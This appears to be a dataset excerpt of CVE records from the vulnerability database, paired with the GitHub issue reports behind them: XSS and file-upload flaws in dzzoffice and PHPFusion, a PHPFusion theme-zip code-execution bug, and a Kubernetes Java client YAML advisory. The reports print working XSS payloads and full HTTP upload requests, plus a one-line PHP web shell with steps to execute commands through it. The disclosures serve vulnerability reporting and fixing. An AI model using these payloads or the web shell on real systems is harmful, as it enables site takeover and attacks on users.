"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/zyx0814/dzzoffice/issues/196 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zyx0814",
"dzzoffice"
] | #Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Email: kietnguyenanh9320@gmail.com
#Submit date: 28/08/2021
#Target: http://www.dzzoffice.com/
#Version: 2.02.1 (https://github.com/zyx0814/dzzoffice/releases/tag/2.02.1)
# Description:
Because of lacking of sanitizer of input data at all of upload functions in `webroot/dzz/attach/Uploader.class.php` and return wrong response content-type of output data in `webroot/dzz/attach/controller.php`, The Authenticated user (not an admin) can injection malicious code into `fileName` and craft a specific html file, then user click on that file the script will be executed.
# To Reproduce
Steps to reproduce the behavior:
1. Go to any textarea form and use upload function
2. Inject malicious script into fileName like ``<img src=x onerror=alert(1);``
3. Craft an specific html file to send request to server in webclient, when user click on that file malicious script will be executed
### Request
```
POST /index.php?mod=attach&op=controller&action=uploadfile&encode=utf-8 HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------217491654215499331073774419025
Content-Length: 893
Origin: http://172.16.0.12:4444
Connection: close
-----------------------------217491654215499331073774419025
Content-Disposition: form-data; name="id"
WU_FILE_0
-----------------------------217491654215499331073774419025
Content-Disposition: form-data; name="name"
<img src=x onerror=alert(1);>.jpg
-----------------------------217491654215499331073774419025
Content-Disposition: form-data; name="type"
image/jpeg
-----------------------------217491654215499331073774419025
Content-Disposition: form-data; name="lastModifiedDate"
8/28/2021, 10:51:39
-----------------------------217491654215499331073774419025
Content-Disposition: form-data; name="size"
24041
-----------------------------217491654215499331073774419025
Content-Disposition: form-data; name="upfile"; filename="<img src=x onerror=alert(1);>kietna.jpg"
Content-Type: image/jpeg
1111
-----------------------------217491654215499331073774419025--
```
###IMAGE




### Response
```
HTTP/1.1 200 OK
Date: Sat, 28 Aug 2021 03:58:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Set-Cookie: ORRL_2132_saltkey=DgE37EkI; expires=Mon, 27-Sep-2021 03:58:15 GMT; Max-Age=2592000; path=/; HttpOnly
Set-Cookie: ORRL_2132_lastvisit=1630119495; expires=Mon, 27-Sep-2021 03:58:15 GMT; Max-Age=2592000; path=/
Set-Cookie: ORRL_2132_sid=GvNq0a; expires=Sun, 29-Aug-2021 03:58:15 GMT; Max-Age=86400; path=/
Set-Cookie: ORRL_2132_lastact=1630123095%09index.php%09attach; expires=Sun, 29-Aug-2021 03:58:15 GMT; Max-Age=86400; path=/
Content-Length: 1009
Connection: close
Content-Type: text/html; charset=utf-8
{"state":"SUCCESS","url":"index.php?mod=io&op=thumbnail&width=0&height=0&original=1&path=MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","title":"<img src=x onerror=alert(1);>kietna.jpg","original":"<img src=x onerror=alert(1);>kietna.jpg","type":".jpg","size":4,"attach":{"aid":"2","filename":"<img src=x onerror=alert(1);>kietna.jpg","filetype":"jpg","filesize":"4 B ","attachment":"dzz\/202108\/28\/115309kip2jipijtji4nq6.jpg","remote":"0","copys":"0","md5":"b59c67bf196a4758191e42f76670ceba","thumb":"0","dateline":"1630122789","unrun":"0","url":"index.php?mod=io&op=thumbnail&width=0&height=0&original=1&path=MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","img":"index.php?mod=io&op=thumbnail&width=256&height=256&original=0&path=MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","isimage":1,"apath":"MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","dpath":"MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M"}}
```
| Lacking of sanitizer fileName lead to Cross-site Scripting in Upload function | https://api.github.com/repos/zyx0814/dzzoffice/issues/196/comments | 1 | 2021-08-28T04:19:09Z | 2021-08-28T04:34:28Z | https://github.com/zyx0814/dzzoffice/issues/196 | 981,723,190 | 196 | 2,684 |
CVE-2021-40541 | 2021-10-11T14:15:07.647 | PHPFusion 9.03.110 is affected by cross-site scripting (XSS) in the preg patterns filter html tag without "//" in descript() function An authenticated user can trigger XSS by appending "//" in the end of text. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2373"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2373"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*",
"matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/PHPFusion/PHPFusion/issues/2373 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PHPFusion",
"PHPFusion"
] | #KietNA From Inv1cta Team, HPT Cyber Security Center
Sorry for bad english
**Describe the bug**
preg patterns filter html tag without "//" in descript() function, the authenticated user can trigger xss by append "//" in the end of text
**Version**
PHPFusion version: PHPFusion 9.03.110
**To Reproduce**
Steps to reproduce the behavior:
1. Go to any textarea form
2. Add "<svg onload=alert(1)//" in textarea form and submit
3. When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission
**Screenshots**
preg pattern filter html tag without "//" in the end of html

User preview and submit submission

Admin preview submission of user

Admin publish submission and the attacker can store malicious script

The Attacker can store malicious script in forum without admin browsing the post by post new thread function

When admin click on Activity button, the script of user kietna will be executed

**Additional context**
###REQUEST:
```
POST /submit.php?stype=a HTTP/1.1
Host: 172.16.0.12:5554
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: http://172.16.0.12:5554
Connection: close
Referer: http://172.16.0.12:5554/submit.php?stype=a
Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_lastvisit=1629852584; fusionc4q8w_user=2.1630031855.2d2e26d63d89a73447202a9978b3ff81a084dae1acbddeeb4c6fd5de86f85469
Upgrade-Insecure-Requests: 1
fusion_token=2-1629861818-8b90d545094236c6cc3daa34012b16531afc70a7d12df00e8dba976f92f37e84&form_id=submissionform&fusion_wKs75X=&article_subject=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_keywords=&article_cat=1&article_language%5B%5D=English&article_snippet=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_article=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&preview_article=Preview
```
###RESPONSE:
```
HTTP/1.1 200 OK
Date: Wed, 25 Aug 2021 03:25:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHPFusion 9.03.110
Last-Modified: Wed, 25 Aug 2021 03:25:25 GMT
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68868
```
| Bypass preg pattern lead to Cross-site Scripting in descript() function | https://api.github.com/repos/PHPFusion/PHPFusion/issues/2373/comments | 3 | 2021-08-25T03:33:12Z | 2021-09-01T11:22:54Z | https://github.com/PHPFusion/PHPFusion/issues/2373 | 978,672,135 | 2,373 | 2,685 |
CVE-2021-25738 | 2021-10-11T19:15:07.487 | Loading specially-crafted yaml with the Kubernetes Java Client library can lead to code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "jordan@liggitt.net",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/08/23/2"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes-client/java/issues/1698"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/K_pOK2WbAJk"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/08/23/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes-client/java/issues/1698"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/K_pOK2WbAJk"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "697973C0-82C4-45DD-9240-7722F8C2F229",
"versionEndExcluding": null,
"versionEndIncluding": "9.0.2",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8C9C6D5-285E-411A-BE51-E46CBF69A58C",
"versionEndExcluding": null,
"versionEndIncluding": "10.0.1",
"versionStartExcluding": null,
"versionStartIncluding": "10.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D50DD1C8-E23A-4C05-AA26-CB9FB9C8538B",
"versionEndExcluding": "11.0.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "11.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/kubernetes-client/java/issues/1698 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kubernetes-client",
"java"
] | A security issue was discovered in the Kubernetes Java client library where loading specially-crafted yaml can lead to code execution.
This issue has been rated Medium ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)), and assigned CVE-2021-25738.
### Am I vulnerable?
If you process untrusted inputs with the [Kubernetes Java Client](https://github.com/kubernetes-client/java) you may be vulnerable to this issue.
#### Affected Versions
* Kubernetes Java Client == v12.0.0
* Kubernetes Java Client <= v11.0.1
* Kubernetes Java Client <= v10.0.1
* Kubernetes Java Client <= v9.0.2
### How do I mitigate this vulnerability?
Prior to upgrading, this vulnerability can be mitigated by validating inputs to the client.
#### Fixed Versions
* Kubernetes Java Client _master_ - Patched by https://github.com/kubernetes-client/java/pull/1676
* Kubernetes Java Client >= v12.0.1 - Patched by https://github.com/kubernetes-client/java/pull/1691
* Kubernetes Java Client >= v11.0.2 - Patched by https://github.com/kubernetes-client/java/pull/1692
### Detection
If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io
#### Acknowledgements
This vulnerability was reported by Jordy Versmissen through our [bug bounty](https://hackerone.com/kubernetes).
| CVE-2021-25738: Code exec via yaml parsing | https://api.github.com/repos/kubernetes-client/java/issues/1698/comments | 0 | 2021-05-10T18:42:48Z | 2021-05-17T21:01:16Z | https://github.com/kubernetes-client/java/issues/1698 | 884,853,002 | 1,698 | 2,686 |
CVE-2021-40188 | 2021-10-11T19:15:07.547 | PHPFusion 9.03.110 is affected by an arbitrary file upload vulnerability. The File Manager function in admin panel does not filter all PHP extensions such as ".php, .php7, .phtml, .php5, ...". An attacker can upload a malicious file and execute code on the server. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2372"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2372"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*",
"matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/PHPFusion/PHPFusion/issues/2372 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PHPFusion",
"PHPFusion"
] | #By KietNA From Inv1cta team, HPT Cyber Security Center
**Describe the bug**
File Manager function in admin panel does not filter all of php extensions like ".php, .php7, .phtml, .php5, ...", The attacker can upload malicious file and execute code in server
**Version**
PHPFusion version: PHPFusion 9.03.110
**To Reproduce**
Steps to reproduce the behavior:
1. Go to administrator panel and click on FileManager function
2. Click on Upload file button, then choose .php file
3. The path of file will return in response
4. Finally, access and execute code on server
**Screenshots**

Request and response of function

Execute code on server:

**Additional context**
Although PHPFusion have 2 step verification for administrator panel, but if cookie of admin users were stolen, the attacker can POST request upload file with that cookie and execute code on server
###REQUEST:
```
POST /includes/elFinder/php/connector.php?aid=e5c19545a88a5d4d HTTP/1.1
Host: 172.16.0.12:5554
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3950035332713980620819721882
Content-Length: 706
Origin: http://172.16.0.12:5554
Connection: close
Referer: http://172.16.0.12:5554/administration/file_manager.php?aid=e5c19545a88a5d4d
Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_lastvisit=1629684275; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_lastvisit=1629839491; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_user=1.1630015933.97acae239cf33f2741f9b3537eb071fcd6b9e8c560188e44b734cda6c4957cdd; fusionc4q8w_admin=1.1630015939.a2f2f7349b5f7f589227e2cba22a9361986acb754ff4468e1a3a48fad223c176
-----------------------------3950035332713980620819721882
Content-Disposition: form-data; name="reqid"
17b7a38fbae2eb
-----------------------------3950035332713980620819721882
Content-Disposition: form-data; name="cmd"
upload
-----------------------------3950035332713980620819721882
Content-Disposition: form-data; name="target"
l1_Lw
-----------------------------3950035332713980620819721882
Content-Disposition: form-data; name="upload[]"; filename="3.php"
Content-Type: text/php
<?=`$_GET[0]`?>
-----------------------------3950035332713980620819721882
Content-Disposition: form-data; name="mtime[]"
1625501319
-----------------------------3950035332713980620819721882--
```
###RESPONSE:
```
HTTP/1.1 200 OK
Date: Tue, 24 Aug 2021 22:23:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHPFusion 9.03.110
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/
Content-Length: 1090
X-Content-Type-Options: nosniff
Connection: close
Content-Type: application/json; charset=utf-8
{"added":[{"isowner":false,"ts":1629843816,"mime":"text\/x-php","read":1,"write":1,"size":"16","hash":"l1_My5waHA","name":"3.php","phash":"l1_Lw","url":"http:\/\/172.16.0.12:5554\/images\/3.php"}],"removed":["l1_My5waHA"],"changed":[{"isowner":false,"ts":1614754682,"mime":"directory","read":1,"write":1,"size":0,"hash":"l1_Lw","name":"root_images","rootRev":"","options":{"path":"","url":"","tmbUrl":"","disabled":[],"separator":"\\","copyOverwrite":1,"uploadOverwrite":1,"uploadMaxSize":9223372036854775807,"uploadMaxConn":3,"uploadMime":{"firstOrder":"deny","allow":[],"deny":[]},"dispInlineRegex":"^(?:(?:video|audio)|image\/(?!.+\\+xml)|application\/(?:ogg|x-mpegURL|dash\\+xml)|(?:text\/plain|application\/pdf)$)","jpgQuality":100,"archivers":{"create":["application\/zip"],"extract":["application\/zip"],"createext":{"application\/zip":"zip"}},"uiCmdMap":[],"syncChkAsTs":1,"syncMinMs":0,"i18nFolderName":0,"tmbCrop":1,"tmbReqCustomData":false,"substituteImg":true,"onetimeUrl":true,"csscls":"elfinder-navbar-root-local"},"volumeid":"l1_","locked":1,"dirs":1,"isroot":1,"phash":""}]}
``` | File Manager does not filter php extension lead to Upload malicious files | https://api.github.com/repos/PHPFusion/PHPFusion/issues/2372/comments | 3 | 2021-08-24T22:29:42Z | 2021-08-25T14:18:30Z | https://github.com/PHPFusion/PHPFusion/issues/2372 | 978,534,506 | 2,372 | 2,687 |
CVE-2021-40189 | 2021-10-11T19:15:07.587 | PHPFusion 9.03.110 is affected by a remote code execution vulnerability. The theme function will extract a file to "webroot/themes/{Theme Folder], where an attacker can access and execute arbitrary code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2374"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/PHPFusion/PHPFusion/issues/2374"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*",
"matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/PHPFusion/PHPFusion/issues/2374 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"PHPFusion",
"PHPFusion"
] | #KietNA From Inv1cta Team, HPT Cyber Security Center
**Describe the bug**
The attacker can abuse upload theme function to insert malicious php code or php file into zip file and upload to server, then the function will extract that file to "webroot/themes/[Theme Folder], the attacker can access and execute arbitrary code
**Version**
PHPFusion version: PHPFusion 9.03.110
**To Reproduce**
Steps to reproduce the behavior:
1. Add " <?=`$_GET[0]`?>" in line one php file of plugin or create a php file in any folder then zip it (i create kietna.php file in forum folder)
1. Go to Theme Manager function in admin panel
2. Click on Upload New Theme tab
3. Upload malicious zip file
4. Access "/themes/[Plugin Folder]/theme.php?0=ls" or "/themes/[Plugin Folder]/forum/kietna.php?0=ls" to execute arbitrary code
**Screenshots**


The function extracted malicious zip file:

Execute code:

**Additional context**
It is look like CVE-2019-11631: https://www.exploit-db.com/exploits/46775
| PHP Code Execution Via Inject Malicious Code Or Create New Php File In Zip Theme | https://api.github.com/repos/PHPFusion/PHPFusion/issues/2374/comments | 4 | 2021-08-26T06:20:18Z | 2021-08-27T08:12:12Z | https://github.com/PHPFusion/PHPFusion/issues/2374 | 979,878,754 | 2,374 | 2,688 |
CVE-2021-40239 | 2021-10-11T19:15:07.627 | A Buffer Overflow vulnerability exists in the latest version of Miniftpd in the do_retr function in ftpproto.c | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gabe-commiter/Miniftpd/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gabe-commiter/Miniftpd/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniftpd_project:miniftpd:1.0:*:*:*:*:*:*:*",
